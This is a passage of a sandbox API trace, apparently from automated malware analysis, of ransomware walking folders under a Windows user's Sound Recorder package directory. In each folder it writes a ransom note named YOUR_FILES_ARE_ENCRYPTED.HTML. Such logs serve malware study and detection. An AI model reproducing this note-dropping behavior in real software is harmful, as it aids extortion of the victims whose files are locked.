dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0120.615] WriteFile (in: hFile=0x324, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.616] CloseHandle (hObject=0x324) returned 1 [0120.616] GetProcessHeap () returned 0x600000 [0120.616] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.616] GetProcessHeap () returned 0x600000 [0120.616] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.616] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc0caaae, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xc0caaae, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xc0caaae, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="Temp", cAlternateFileName="")) returned 1 [0120.616] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.616] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\Temp") returned 101 [0120.616] GetProcessHeap () returned 0x600000 [0120.616] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.616] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\Temp" [0120.616] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\Temp\\*" [0120.616] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc0caaae, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xc0caaae, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xc0caaae, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3106d40, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x626638 [0120.618] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc0caaae, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xc0caaae, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xc0caaae, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3106d40, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0120.618] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc0caaae, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xc0caaae, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xc0caaae, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3106d40, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 0 [0120.618] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0120.618] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 131 [0120.618] GetProcessHeap () returned 0x600000 [0120.618] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.618] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowssoundrecorder_8wekyb3d8bbwe\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0120.619] WriteFile (in: hFile=0x324, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.619] CloseHandle (hObject=0x324) returned 1 [0120.620] GetProcessHeap () returned 0x600000 [0120.620] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.620] GetProcessHeap () returned 0x600000 [0120.620] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.620] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc0caaae, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xc0caaae, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xc0caaae, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="Temp", cAlternateFileName="")) returned 0 [0120.620] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0120.620] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0120.620] GetProcessHeap () returned 0x600000 [0120.620] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.620] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowssoundrecorder_8wekyb3d8bbwe\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.621] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.622] CloseHandle (hObject=0x320) returned 1 [0120.622] GetProcessHeap () returned 0x600000 [0120.622] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.622] GetProcessHeap () returned 0x600000 [0120.622] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.623] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc0583b1, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xc0583b1, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xc0583b1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0120.623] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.623] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AppData") returned 101 [0120.623] GetProcessHeap () returned 0x600000 [0120.623] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.624] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AppData" [0120.624] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AppData\\*" [0120.624] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc0583b1, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xc0583b1, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xc0583b1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626638 [0120.624] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc0583b1, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xc0583b1, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xc0583b1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0120.624] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc0583b1, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xc0583b1, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xc0583b1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0120.624] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0120.625] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 131 [0120.625] GetProcessHeap () returned 0x600000 [0120.625] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.625] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowssoundrecorder_8wekyb3d8bbwe\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.626] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.627] CloseHandle (hObject=0x320) returned 1 [0120.627] GetProcessHeap () returned 0x600000 [0120.627] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.627] GetProcessHeap () returned 0x600000 [0120.627] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.627] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf997b3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xbf997b3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xbf997b3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0120.627] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.627] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalCache") returned 104 [0120.627] GetProcessHeap () returned 0x600000 [0120.627] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.627] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalCache" [0120.627] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalCache\\*" [0120.627] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf997b3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xbf997b3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xbf997b3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626638 [0120.628] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf997b3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xbf997b3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xbf997b3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0120.628] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf997b3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xbf997b3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xbf997b3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0120.628] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0120.628] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 134 [0120.628] GetProcessHeap () returned 0x600000 [0120.628] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.628] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowssoundrecorder_8wekyb3d8bbwe\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.629] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.629] CloseHandle (hObject=0x320) returned 1 [0120.630] GetProcessHeap () returned 0x600000 [0120.630] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.630] GetProcessHeap () returned 0x600000 [0120.630] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.630] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf73564, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xbf73564, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xbf73564, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0120.630] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.630] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalState") returned 104 [0120.630] GetProcessHeap () returned 0x600000 [0120.630] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.630] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalState" [0120.630] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalState\\*" [0120.630] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf73564, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xbf73564, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xbf73564, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626638 [0120.630] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf73564, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xbf73564, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xbf73564, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0120.630] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf73564, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xbf73564, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xbf73564, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0120.630] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0120.630] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 134 [0120.630] GetProcessHeap () returned 0x600000 [0120.630] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.630] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowssoundrecorder_8wekyb3d8bbwe\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.631] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.632] CloseHandle (hObject=0x320) returned 1 [0120.632] GetProcessHeap () returned 0x600000 [0120.632] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.632] GetProcessHeap () returned 0x600000 [0120.632] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.633] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc70cdea, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xc70cdea, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xc70cdea, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Microsoft.WindowsSoundRecorder_10.1510.12110.0_x64__8wekyb3d8bbwe", cAlternateFileName="MICROS~1.0_X")) returned 1 [0120.633] StrStrIW (lpFirst="Microsoft.WindowsSoundRecorder_10.1510.12110.0_x64__8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.633] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Microsoft.WindowsSoundRecorder_10.1510.12110.0_x64__8wekyb3d8bbwe") returned 159 [0120.633] GetProcessHeap () returned 0x600000 [0120.633] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.633] lstrcpyW (in: lpString1=0x3106fd8, 